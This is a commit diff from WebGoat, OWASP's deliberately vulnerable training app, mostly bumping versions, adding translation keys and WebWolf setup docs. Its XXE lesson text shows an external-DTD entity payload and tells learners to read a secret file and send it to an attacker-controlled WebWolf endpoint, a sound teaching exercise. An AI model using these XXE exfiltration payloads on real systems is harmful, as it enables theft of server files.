dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

merging from release branch ... PR's and Nanne's recent work

Browse Source
This commit is contained in:
Jason
2018-05-02 14:27:44 -06:00
parent a922c00182 6a5ca43e7e
commit 927bbad488
87 changed files with 542 additions and 174 deletions
Download Patch File Download Diff File Expand all files Collapse all files

2
webgoat-lessons/auth-bypass/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/bypass-restrictions/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/challenge/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>

1
webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/plugin/Flag.java
View File

@ -46,7 +46,6 @@ public class Flag extends Endpoint {
@PostConstruct
public void initFlags() {
IntStream.range(1, 10).forEach(i -> FLAGS.put(i, UUID.randomUUID().toString()));
FLAGS.entrySet().stream().forEach(e -> log.debug("Flag {} {}", e.getKey(), e.getValue()));
}
@Override

2
webgoat-lessons/client-side-filtering/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/client-side-filtering/src/main/java/org/owasp/webgoat/plugin/ClientSideFiltering.java
View File

@ -56,7 +56,7 @@ public class ClientSideFiltering extends NewLesson {
@Override
public String getTitle() {
return "Client side filtering";
return "client.side.filtering.title";
}
@Override

1
webgoat-lessons/client-side-filtering/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -1,3 +1,4 @@
client.side.filtering.title=Client side filtering
ClientSideFilteringSelectUser=Select user:
ClientSideFilteringUserID=User ID
ClientSideFilteringFirstName=First Name

2
webgoat-lessons/cross-site-scripting/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<build>
<plugins>

2
webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScripting.java
View File

@ -60,7 +60,7 @@ public class CrossSiteScripting extends NewLesson {
@Override
public String getTitle() {
return "Cross Site Scripting";
return "xss.title";
}
@Override

1
webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -1,4 +1,5 @@
# XSS success, failure messages and hints
xss.title=Cross Site Scripting
xss-reflected-5a-success=well done, but alerts aren't very impressive are they? Please continue.
xss-reflected-5a-failure=Try again. We do want to see this specific javascript (in case you are trying to do something more fancy)
xss-reflected-5b-success=Correct ... because <ul><li>The script was not triggered by the URL/QueryString</li><li>Even if you use the attack URL in a new tab, it won't execute (becuase of response type). Try it if you like.</li></ul>

2
webgoat-lessons/csrf/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/csrf/src/main/java/org/owasp/webgoat/plugin/CSRFLogin.java
View File

@ -33,7 +33,7 @@ public class CSRFLogin extends AssignmentEndpoint {
}
private void markAssignmentSolvedWithRealUser(String username) {
UserTracker userTracker = userTrackerRepository.findOne(username);
UserTracker userTracker = userTrackerRepository.findByUser(username);
userTracker.assignmentSolved(getWebSession().getCurrentLesson(), this.getClass().getSimpleName());
userTrackerRepository.save(userTracker);
}

4
webgoat-lessons/csrf/src/main/resources/lessonPlans/en/CSRF_ContentType.adoc
View File

@ -8,11 +8,11 @@ In this assignment you need to achieve to POST the following JSON message to our
[source]
----
POST /csrf/feedback HTTP/1.1
POST /csrf/feedback/message HTTP/1.1
{
"name" : "WebGoat",
"email" : "webgoat@webgoat.org"
"email" : "webgoat@webgoat.org",
"content" : "WebGoat is the best!!"
}
----

2
webgoat-lessons/html-tampering/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

2
webgoat-lessons/http-basics/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

1
webgoat-lessons/http-basics/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -8,6 +8,7 @@ http-basics.hints.http_basic_quiz.1=Turn on Show Parameters or other features
http-basics.hints.http_basic_quiz.2=Try to intercept the request with <a href='https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project' title='Link to ZAP'>OWASP ZAP</a>
http-basics.empty=Try again, name cannot be empty.
http-basics.reversed=The server has reversed your name: {0}
http-basics.close=Try again: but this time enter a value before hitting go.

2
webgoat-lessons/http-proxies/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

2
webgoat-lessons/idor/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/insecure-login/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

2
webgoat-lessons/jwt/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/missing-function-ac/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

4
webgoat-lessons/pom.xml
View File

@ -5,12 +5,12 @@
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<packaging>pom</packaging>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
<parent>
<groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<modules>

2
webgoat-lessons/sql-injection/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/plugin/advanced/SqlInjectionAdvanced.java
View File

@ -53,7 +53,7 @@ public class SqlInjectionAdvanced extends NewLesson {
@Override
public String getTitle() {
return "SQL Injection (advanced)";
return "sql.advanced.title";
}
@Override

2
webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/plugin/introduction/SqlInjection.java
View File

@ -60,7 +60,7 @@ public class SqlInjection extends NewLesson {
@Override
public String getTitle() {
return "SQL Injection";
return "sql.injection.title";
}
@Override

2
webgoat-lessons/sql-injection/src/main/java/org/owasp/webgoat/plugin/mitigation/SqlInjectionMitigations.java
View File

@ -53,7 +53,7 @@ public class SqlInjectionMitigations extends NewLesson {
@Override
public String getTitle() {
return "SQL Injection (mitigations)";
return "sql.mitigation.title";
}
@Override

6
webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -1,6 +1,12 @@
#StringSqlInjection.java
StringSqlInjectionSecondStage=Now that you have successfully performed an SQL injection, try the same type of attack on a parameterized query. Restart the lesson if you wish to return to the injectable query.
EnterLastName=Enter your last name:
sql.injection.title=SQL Injection
sql.mitigation.title=SQL Injection (mitigation)
sql.advanced.title=SQL Injection (advanced)
NoResultsMatched=No results matched. Try Again.
SqlStringInjectionHint1=The application is taking your input and inserting it at the end of a pre-formed SQL command.
SqlStringInjectionHint2=This is the code for the query being built and issued by WebGoat:<br><br> "SELECT * FROM user_data WHERE last_name = "accountName"

2
webgoat-lessons/vulnerable-components/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>
<dependency>

2
webgoat-lessons/webgoat-introduction/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

2
webgoat-lessons/webwolf-introduction/pom.xml
View File

@ -6,6 +6,6 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
</project>

7
webgoat-lessons/webwolf-introduction/src/main/java/org/owasp/webgoat/plugin/MailAssignment.java
View File

@ -8,6 +8,7 @@ import org.springframework.beans.factory.annotation.Value;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.ResponseBody;
import org.springframework.web.client.RestClientException;
import org.springframework.web.client.RestTemplate;
import java.time.LocalDateTime;
@ -39,7 +40,11 @@ public class MailAssignment extends AssignmentEndpoint {
.contents("This is a test message from WebWolf, your unique code is: " + StringUtils.reverse(username))
.sender("webgoat@owasp.org")
.build();
restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
try {
restTemplate.postForEntity(webWolfURL, mailEvent, Object.class);
} catch (RestClientException e ) {
return informationMessage().feedback("webwolf.email_failed").output(e.getMessage()).build();
}
return informationMessage().feedback("webwolf.email_send").feedbackArgs(email).build();
} else {
return informationMessage().feedback("webwolf.email_mismatch").feedbackArgs(username).build();

2
webgoat-lessons/webwolf-introduction/src/main/resources/html/WebWolfIntroduction.html
View File

@ -12,6 +12,7 @@
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:Receiving_mail.adoc"></div>
<div class="attack-container">
<img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<form class="attack-form" accept-charset="UNKNOWN"
method="POST" name="form"
@ -66,6 +67,7 @@
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:Landing_page.adoc"></div>
<div class="attack-container">
<img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<a href="/WebGoat/WebWolf/landing/password-reset" target="_blank">Click here to reset your password</a>

2
webgoat-lessons/webwolf-introduction/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -2,7 +2,7 @@ webwolf.title=WebWolf
webwolf.email_send=An email has been send to {0} please check your inbox.
webwolf.code_incorrect=That is not the correct code: {0}, please try again.
webwolf.email_failed=There was an error while sending the e-mail. Is WebWolf running?
webwolf.email_mismatch=Of course you can send mail to user {0} however you will not be able to read this e-mail in WebWolf, please use your own username.

BIN
webgoat-lessons/webwolf-introduction/src/main/resources/images/wolf-enabled.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.7 KiB

26
webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
View File

@ -1,7 +1,17 @@
== Introducing WebWolf
NOTE: You only need WebWolf if you a lesson specifies you can use it. For a lot of lessons you use WebGoat without
starting WebWolf.
You only need WebWolf if you a lesson specifies you can use it. For a lot of lessons you use WebGoat without
starting WebWolf. If you need to do an exercise with WebWolf make sure it is running along side with WebGoat. Lessons
where you can use WebWolf are marked with the following icon (top right in assignment):
{nbsp}
image::images/wolf-enabled.png[width=115,height=128]
{nbsp}
Even if the icon the present your are not obliged to use WebWolf, you can also use any intercepting tool you like, like
`netcat` etc.
WebWolf is a separate web application which simulates an attackers machine. It makes it possible for us to
make a clear distinction between what takes place on the attacked website and the actions you need to do as
@ -20,12 +30,18 @@ are not using the Docker image you will need to download the jar file and start
java -jar webwolf-<<version>>.jar
```
WebWolf is also available as a Docker container:
WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need
to find out the ip address of the Docker container.
```
docker pull webwolf/webwolf-8.0
docker run -it 8081:8081 /home/webwolf/run.sh
WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`)
docker pull webgoat/webwolf
docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 8081:8081 webgoat/webwolf /home/webwolf/run.sh
```
Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If
you start WebGoat as Docker container you need to start WebWolf as Docker container as well.
This will start the application on port 8081, click webWolfLink:here[] to open WebWolf.
First thing you need to do is register a new user within WebWolf.

2
webgoat-lessons/xxe/pom.xml
View File

@ -6,7 +6,7 @@
<parent>
<groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId>
<version>8.0.0.M3</version>
<version>v8.0.0.M14</version>
</parent>
<dependencies>

2
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/XXE.java
View File

@ -58,7 +58,7 @@ public class XXE extends NewLesson {
@Override
public String getTitle() {
return "XXE";
return "xxe.title";
}
@Override

1
webgoat-lessons/xxe/src/main/resources/html/XXE.html
View File

@ -144,6 +144,7 @@
<div class="lesson-page-wrapper">
<div class="adoc-content" th:replace="doc:XXE_blind_assignment.adoc"></div>
<div class="attack-container">
<img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
<form class="attack-form" accept-charset="UNKNOWN"
method="POST" name="form"

1
webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -22,6 +22,7 @@
# projects.
# <p>
#
xxe.title=XXE
xxe.simple.output=Welcome {0} you can now login to our website
xxe.content.type.feedback.json=You are posting JSON which does not work with a XXE
xxe.content.type.feedback.xml=You are posting XML but there is no XXE attack performed

BIN
webgoat-lessons/xxe/src/main/resources/images/wolf-enabled.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 6.7 KiB

11
webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
View File

@ -1,4 +1,3 @@
== Blind XXE
In some cases you will see no output because although your attack might have worked the field is not reflected in the output of page.
@ -6,25 +5,25 @@ Or the resource you are trying to read contains illegal XML character which caus
Let's start with an example, in this case we reference an external DTD which we control on our own server.
As an attacker you have WebWolf under your control (*this can be any server under your control.*), you can for example
use this server to ping it using `http://localhost:8081/ping?text=HelloWorld
use this server to ping it using `webWolfLink:landing[noLink]`
How do we use this endpoint to verify whether we can perform XXE?
We can again use WebWolf to host a file called `attack.dtd`, create this file with the following contents:
[source]
[source, subs="macros, specialcharacters"]
----
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY ping SYSTEM 'http://localhost:8081/ping?text=HelloWorld'>
<!ENTITY ping SYSTEM 'webWolfLink:landing[noLink]'>
----
Now submit the form change the xml using to:
[source]
[source, subs="macros, specialcharacters"]
----
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY % remote SYSTEM "http://localhost:8081/WebWolf/files/attack.dtd">
<!ENTITY % remote SYSTEM "webWolfLink:files/attack.dtd[noLink]">
%remote;
]>
<comment>

8
webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
View File

@ -9,15 +9,15 @@ DTD.
|OS |Location
|Linux
|`/home/USER/.webgoat/XXE/secret.txt`
|`/home/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|Windows
|`c:/Users/USER/.webgoat/XXE/secret.txt`
|`c:/Users/USER/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|Docker
|`/home/webgoat/.webgoat/XXE/secret.txt`
|`/home/webgoat/.webgoat-webGoatVersion:version[]/XXE/secret.txt`
|===
Try to upload this file using WebWolf landing page for example: `http://localhost:8081/WebWolf/landing?text=[contents_file]`
Try to upload this file using WebWolf landing page for example: `webWolfLink:landing?text=contents_file[noLink]`
(NOTE: this endpoint is under your full control)
Once you obtained the contents of the file post it as a new comment on the page and you will solve the lesson.